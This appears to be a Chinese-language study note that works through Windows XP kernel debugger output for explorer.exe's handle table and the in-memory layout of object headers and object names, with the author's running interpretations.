        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES\TCPIP\LINKAGE

03a0: Object: e17b9168  GrantedAccess: 00020019
Object: e17b9168  Type: (80f0a350) Key
    ObjectHeader: e17b9150
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS

03a4: Object: e1a1cfb8  GrantedAccess: 00020019
Object: e1a1cfb8  Type: (80f0a350) Key
    ObjectHeader: e1a1cfa0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS\INTERFACES

03a8: Object: e19bba30  GrantedAccess: 00020019
Object: e19bba30  Type: (80f0a350) Key
    ObjectHeader: e19bba18
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\SERVICES\NETBT\PARAMETERS

03ac: Object: e1837c58  GrantedAccess: 001f0001
Object: e1837c58  Type: (80f430b0) Port
    ObjectHeader: e1837c40
        HandleCount: 1  PointerCount: 1

03b0: Object: ffaf82d8  GrantedAccess: 00100020
Object: ffaf82d8  Type: (80f42e70) File
    ObjectHeader: ffaf82c0
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

03b4: Object: ffb97ac8  GrantedAccess: 001f0003
Object: ffb97ac8  Type: (80f0e490) Event
    ObjectHeader: ffb97ab0
        HandleCount: 1  PointerCount: 1

03b8: Object: ffaf4da8  GrantedAccess: 001f03ff
Object: ffaf4da8  Type: (80f44528) Thread
    ObjectHeader: ffaf4d90
        HandleCount: 2  PointerCount: 4

03bc: Object: ffb97b90  GrantedAccess: 001f0003
Object: ffb97b90  Type: (80f0e490) Event
    ObjectHeader: ffb97b78
        HandleCount: 1  PointerCount: 1

03c0: Object: e182d308  GrantedAccess: 001f0001
Object: e182d308  Type: (80f430b0) Port
    ObjectHeader: e182d2f0
        HandleCount: 1  PointerCount: 1

03c4: Object: ffba38d8  GrantedAccess: 001f0003 (Protected)
Object: ffba38d8  Type: (80f0e490) Event
    ObjectHeader: ffba38c0
        HandleCount: 1  PointerCount: 2

03c8: Object: e16bc998  GrantedAccess: 001f0001
Object: e16bc998  Type: (80f430b0) Port
    ObjectHeader: e16bc980
        HandleCount: 1  PointerCount: 1

03cc: Object: ffaecb80  GrantedAccess: 001f0003
Object: ffaecb80  Type: (80f0e490) Event
    ObjectHeader: ffaecb68
        HandleCount: 1  PointerCount: 1

03d0: Object: e1aad4b0  GrantedAccess: 001f0001
Object: e1aad4b0  Type: (80f430b0) Port
    ObjectHeader: e1aad498
        HandleCount: 1  PointerCount: 1

03d4: Object: e176c370  GrantedAccess: 0000000c
Object: e176c370  Type: (80f44900) Token
    ObjectHeader: e176c358
        HandleCount: 1  PointerCount: 1

03d8: Object: ffaecb10  GrantedAccess: 001f0003
Object: ffaecb10  Type: (80f0e490) Event
    ObjectHeader: ffaecaf8
        HandleCount: 1  PointerCount: 1

03dc: Object: ffb98678  GrantedAccess: 001f0003
Object: ffb98678  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb98660
        HandleCount: 1  PointerCount: 1

03e0: Object: ffaf7340  GrantedAccess: 001f0001
Object: ffaf7340  Type: (80f0d040) Mutant
    ObjectHeader: ffaf7328
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.MUTEX.EBC

03e4: Object: e1803510  GrantedAccess: 00020019
Object: e1803510  Type: (80f0a350) Key
    ObjectHeader: e18034f8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\MACHINE\SYSTEM\CONTROLSET001\CONTROL\NETWORKPROVIDER\HWORDER

03e8: Object: e17fee08  GrantedAccess: 000f001f
Object: e17fee08  Type: (80f0a040) Section
    ObjectHeader: e17fedf0
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.SFM.EBC

03ec: Object: ffbc8028  GrantedAccess: 00100020
Object: ffbc8028  Type: (80f42e70) File
    ObjectHeader: ffbc8010
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.10.0_x-ww_f7fb5805 {HarddiskVolume1}

03f0: Object: ffaf7340  GrantedAccess: 001f0001
Object: ffaf7340  Type: (80f0d040) Mutant
    ObjectHeader: ffaf7328
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.MUTEX.EBC

03f4: Object: e17fee08  GrantedAccess: 000f001f
Object: e17fee08  Type: (80f0a040) Section
    ObjectHeader: e17fedf0
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.SFM.EBC

03f8: Object: ffb0fd28  GrantedAccess: 001f0003
Object: ffb0fd28  Type: (80f0e490) Event
    ObjectHeader: ffb0fd10
        HandleCount: 1  PointerCount: 1

0400: Object: ffb9b480  GrantedAccess: 00100003
Object: ffb9b480  Type: (80f0dca0) Semaphore
    ObjectHeader: ffb9b468
        HandleCount: 1  PointerCount: 1

0404: Object: 80f35b58  GrantedAccess: 001f0003
Object: 80f35b58  Type: (80f0e490) Event
    ObjectHeader: 80f35b40
        HandleCount: 1  PointerCount: 1

0408: Object: ffb68020  GrantedAccess: 001f03ff
Object: ffb68020  Type: (80f44528) Thread
    ObjectHeader: ffb68008
        HandleCount: 3  PointerCount: 5

040c: Object: 80f35b88  GrantedAccess: 001f0003 (Protected)
Object: 80f35b88  Type: (80f0e490) Event
    ObjectHeader: 80f35b70
        HandleCount: 1  PointerCount: 2

0410: Object: ffb108f8  GrantedAccess: 001f0003
Object: ffb108f8  Type: (80f0e490) Event
    ObjectHeader: ffb108e0
        HandleCount: 1  PointerCount: 1

0414: Object: 80ece750  GrantedAccess: 001f0003
Object: 80ece750  Type: (80f0e490) Event
    ObjectHeader: 80ece738
        HandleCount: 1  PointerCount: 3

0418: Object: 80f35db8  GrantedAccess: 001f0003
Object: 80f35db8  Type: (80f0e490) Event
    ObjectHeader: 80f35da0
        HandleCount: 1  PointerCount: 1

041c: Object: e1800df0  GrantedAccess: 000f003f
Object: e1800df0  Type: (80f0a350) Key
    ObjectHeader: e1800dd8
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \REGISTRY\USER\S-1-5-21-1390067357-776561741-839522115-1003\PRINTERS\CONNECTIONS

0420: Object: 80ece780  GrantedAccess: 001f0003 (Protected)
Object: 80ece780  Type: (80f0e490) Event
    ObjectHeader: 80ece768
        HandleCount: 1  PointerCount: 2

0424: Object: 80f35d88  GrantedAccess: 001f0003
Object: 80f35d88  Type: (80f0e490) Event
    ObjectHeader: 80f35d70
        HandleCount: 1  PointerCount: 2

0428: Object: ffb68020  GrantedAccess: 001f03ff
Object: ffb68020  Type: (80f44528) Thread
    ObjectHeader: ffb68008
        HandleCount: 3  PointerCount: 5

042c: Object: ffb74da8  GrantedAccess: 001f03ff
Object: ffb74da8  Type: (80f44528) Thread
    ObjectHeader: ffb74d90
        HandleCount: 2  PointerCount: 4

0430: Object: ffb10928  GrantedAccess: 001f0003 (Protected)
Object: ffb10928  Type: (80f0e490) Event
    ObjectHeader: ffb10910
        HandleCount: 1  PointerCount: 2

0434: Object: 80d5e270  GrantedAccess: 001f0003
Object: 80d5e270  Type: (80f0e490) Event
    ObjectHeader: 80d5e258
        HandleCount: 1  PointerCount: 1

0438: Object: e1644f68  GrantedAccess: 001f0001
Object: e1644f68  Type: (80f430b0) Port
    ObjectHeader: e1644f50
        HandleCount: 1  PointerCount: 1

043c: Object: 80d5e2a0  GrantedAccess: 001f0003 (Inherit)
Object: 80d5e2a0  Type: (80f0e490) Event
    ObjectHeader: 80d5e288
        HandleCount: 2  PointerCount: 3


通过查看其他进程的 HANDLE 列表,HANDLE 000c 是否表示进程的当前(环境)目录?因为其他进程运行后这个句柄显示的是可执行文件所在的目录,而 explorer 的不是(下面看到它指向 \Documents and Settings\uty,是否就是当前工作目录待确认)。
查看000c句柄所对应的object
kd> !handle 000c 3 ffb67708
processor number 0, process ffb67708
PROCESS ffb67708  SessionId: 0  Cid: 06c0    Peb: 7ffdf000  ParentCid: 0684
    DirBase: 097c3000  ObjectTable: e1600ad0  HandleCount: 270.
    Image: explorer.exe

New version of handle table at e168f000 with 270 Entries in use
000c: Object: ffb69078  GrantedAccess: 00100020 (Inherit)
Object: ffb69078  Type: (80f42e70) File
    ObjectHeader: ffb69060
        HandleCount: 1  PointerCount: 1
        Directory Object: 00000000  Name: \Documents and Settings\uty {HarddiskVolume1}

kd> dt _OBJECT_HEADER
   +0x000 PointerCount     : Int4B
   +0x004 HandleCount      : Int4B
   +0x004 NextToFree       : Ptr32 Void
   +0x008 Type             : Ptr32 _OBJECT_TYPE
   +0x00c NameInfoOffset   : UChar
   +0x00d HandleInfoOffset : UChar
   +0x00e QuotaInfoOffset  : UChar
   +0x00f Flags            : UChar
   +0x010 ObjectCreateInfo : Ptr32 _OBJECT_CREATE_INFORMATION
   +0x010 QuotaBlockCharged : Ptr32 Void
   +0x014 SecurityDescriptor : Ptr32 Void
   +0x018 Body             : _QUAD

kd> dd ffb69060
ffb69060  00000001 00000001 80f42e70 40000800
ffb69070  ffb75270 00000000 00700005 80f18a20
ffb69080  80f2b880 e1396aa8 e178a320 00000000

NameInfoOffset 居然是 0,可 !handle 明明显示了 Name,奇怪。(注意这个 File 对象的 Directory Object 是 00000000,而下面有名字的 Section/Mutant 都指向 e14ce6c8;File 对象显示的路径很可能取自文件对象本身而不是对象头前面的 name info,所以 NameInfoOffset 为 0 并不矛盾——待确认。)

找个有名字的看
kd> !handle 03f4 3 ffb67708
processor number 0, process ffb67708
PROCESS ffb67708  SessionId: 0  Cid: 06c0    Peb: 7ffdf000  ParentCid: 0684
    DirBase: 097c3000  ObjectTable: e1600ad0  HandleCount: 270.
    Image: explorer.exe

New version of handle table at e168f000 with 270 Entries in use
03f4: Object: e17fee08  GrantedAccess: 000f001f
Object: e17fee08  Type: (80f0a040) Section
    ObjectHeader: e17fedf0
        HandleCount: 3  PointerCount: 4
        Directory Object: e14ce6c8  Name: MSCTF.Shared.SFM.EBC

kd> dd e17fedf0
e17fedf0  00000004 00000003 80f0a040 00200010
e17fee00  ffb75270 e155114d 00000000 00000000
e17fee10  00000000 00000000 00000000 e1aec0a0
e17fee20  00080000 00000000 00011000 00000004
e17fee30  0001020d 61564d43 0c020201 49564d43
e17fee40  8000cab0 e1ac58b9 0c030202 3066744e
e17fee50  e1446390 e17292d8 085aba89 00000032
e17fee60  0c0d0203 61444d43 00240001 000e6b76

NameInfoOffset 的值为 0x10:对象头 +0x00c 处的 dword 是 00200010,按小端拆开即 NameInfoOffset=0x10、HandleInfoOffset=0x00、QuotaInfoOffset=0x20、Flags=0x00,也就是说 name info 位于对象头之前 0x10 字节处。
在jiurl的文章里说在2000里NAME的结构是
/* Name info that precedes an OBJECT_HEADER (Win2k layout as given in jiurl's
 * article; the XP dump below at e17fedf0-0x10 shows the same 0x10-byte shape). */
typedef struct _OBJECT_NAME
{
/*000*/ POBJECT_DIRECTORY Directory;   /* object directory holding the name; e14ce6c8 = \BaseNamedObjects in the dump below */
/*004*/ UNICODE_STRING Name;           /* counted string: Length/MaximumLength are in bytes and Buffer is NOT NUL-terminated - never use it as a C string */
/*00C*/ DWORD Reserved;                /* reads 00000001 in the dump below; its meaning is not established on this page */
/*010*/ }                              /* sizeof == 0x10 */
OBJECT_NAME;
XP 下没有这个名字的结构,但从对象头前面 0x10 字节的内存可以看出布局还是原来那样:
kd> dd e17fedf0-10
e17fede0  e14ce6c8 00280028 e1787320 00000001
e17fedf0  00000004 00000003 80f0a040 00200010
e17fee00  ffb75270 e155114d 00000000 00000000
e17fee10  00000000 00000000 00000000 e1aec0a0
e17fee20  00080000 00000000 00011000 00000004
e17fee30  0001020d 61564d43 0c020201 49564d43
e17fee40  8000cab0 e1ac58b9 0c030202 3066744e
e17fee50  e1446390 e17292d8 085aba89 00000032
kd> du e1787320
e1787320  "MSCTF.Shared.SFM.EBCІం潉捃Ḙᄍ"
(后面的乱码不属于这个名字:UNICODE_STRING 的 Length/MaximumLength 都是 0x28 字节,正好 20 个字符,缓冲区后面没有结尾的 NUL,du 会一直读到遇见 NUL 为止。所以在驱动里比较或复制对象名时必须按 Length 取长度,不能把 Buffer 当作以 NUL 结尾的 C 字符串使用。)
kd> !object e14ce6c8
Object: e14ce6c8  Type: (80f44ca0) Directory
    ObjectHeader: e14ce6b0
    HandleCount: 16  PointerCount: 185
    Directory Object: e1000640  Name: BaseNamedObjects

    Hash Address  Type          Name
    —- ——-  —-          —-
     00  e13aeb88 SymbolicLink  Local
         ffb1a0f8 Mutant        ZonesCacheCounterMutex
         ffb17d90 Event         WINMGMT_COREDLL_UNLOADED
         80dfda30 Event         userenv: Machine Group Policy has been applied
         ffb794a0 Event         userenv: machine policy force refresh event
         ffba4a70 Event         AgentToWkssvcEvent
         ffba4b30 Event         jjCSCSessEvent_UM_KM_0
     01  e169f040 Section       CTF.TimListCache.FMPDefaultS-1-5-21-1390067357-776561741-839522115-1003SFM.DefaultS-1-5-21-1390067357-776561741-839522115-1003
         80e23ec8 Event         TermSrvReadyEvent
         ffb5ec78 Event         SRIdleReqEvent
         ffb70790 Mutant        0CADFD67AF62496dB34264F000F5624A
         ffba5138 Mutant        WPA_RT_MUTEX
….